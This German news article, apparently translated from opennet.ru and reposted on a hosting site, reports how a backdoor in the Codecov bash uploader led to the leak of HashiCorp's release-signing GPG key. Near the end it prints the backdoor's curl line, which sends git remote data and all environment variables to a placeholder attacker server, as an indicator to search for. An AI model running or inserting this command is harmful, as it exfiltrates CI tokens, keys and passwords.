Die Integration von schädlichem Code in das Codecov-Skript führte zur Kompromittierung des PGP-Schlüssels von HashiCorp.

Das Unternehmen HashiCorp, bekannt für die Entwicklung der Open-Source-Tools Vagrant, Packer, Nomad und Terraform, hat einen Leak des geheimen GPG-Schlüssels bekannt gegeben, der zur Erstellung digitaler Signaturen verwendet wird, um die Releases zu verifizieren. Angreifer, die Zugriff auf den GPG-Schlüssel erlangt haben, könnten potenziell versteckte Änderungen an den Produkten von HashiCorp vornehmen und diese mit einer korrekten digitalen Signatur bescheinigen. Das Unternehmen erklärte, dass bei der durchgeführten Überprüfung keine Anzeichen für Versuche zur Durchführung solcher Modifikationen gefunden wurden.

Derzeit wurde der kompromittierte GPG-Schlüssel zurückgezogen, und ein neuer Schlüssel wurde eingeführt. Das Problem betraf nur die Verifikation mittels der Dateien SHA256SUM und SHA256SUM.sig und hatte keinen Einfluss auf die Erstellung digitaler Signaturen für die Linux-Pakete DEB und RPM, die über releases.hashicorp.com bereitgestellt werden, sowie auf die Mechanismen zur Bestätigung von Releases für macOS und Windows (AuthentiCode).

Die Sicherheitslücke entstand durch die Verwendung des Codecov Bash Uploaders (codecov-bash) in der Infrastruktur, der für das Hochladen von Coverage-Berichten aus kontinuierlichen Integrationssystemen gedacht ist. Im Laufe eines Angriffs auf das Unternehmen Codecov wurde ein Backdoor in dieses Skript eingebaut, durch das die Übermittlung von Passwörtern und Verschlüsselungsschlüsseln an der Server Kriminelle ermöglicht wurde.

Die Angreifer nutzten eine Schwachstelle im Erstellungsprozess des Docker-Images von Codecov aus, die es ermöglichte, Zugangsdaten für GCS (Google Cloud Storage) zu extrahieren, die erforderlich waren, um Änderungen am Bash Uploader-Skript vorzunehmen, das von der Seite codecov.io verbreitet wurde. Diese Änderungen wurden bereits am 31. Januar vorgenommen und blieben zwei Monate lang unentdeckt, wodurch die Angreifer in der Lage waren, Informationen zu extrahieren, die in den Umgebungen der kontinuierlichen Integrationssysteme der Kunden gespeichert waren. Mit dem hinzugefügten schädlichen Code konnten die Angreifer Informationen zu dem getesteten Git-Repository sowie zu allen Umgebungsvariablen, einschließlich Tokens, Verschlüsselungsschlüsseln und Passwörtern, abrufen, die in die kontinuierlichen Integrationssysteme übermittelt wurden, um Zugang zu den Anwendungscodes, Repositories und Diensten wie Amazon Web Services und GitHub zu erhalten.

Neben dem direkten Aufruf wurde das Codecov Bash Uploader-Skript auch in anderen Uploadern wie Codecov-action (Github), Codecov-circleci-orb und Codecov-bitrise-step verwendet, deren Nutzer ebenfalls von diesem Problem betroffen sind. Allen Nutzern von codecov-bash und verwandten Produkten wird empfohlen, ihre Infrastruktur zu überprüfen sowie ihre Passwörter und Verschlüsselungsschlüssel zu ändern. Das Vorhandensein eines Backdoors im Skript kann überprüft werden, indem nach der Zeile gesucht wird: curl -sm 0.5 -d „$(git remote -v)<<<<<< ENV $(env)“ http://<IP-des-angreifenden-Servers>/upload/v2 || true

Quelle: opennet.ru

Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server 🔥 Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server | ProHoster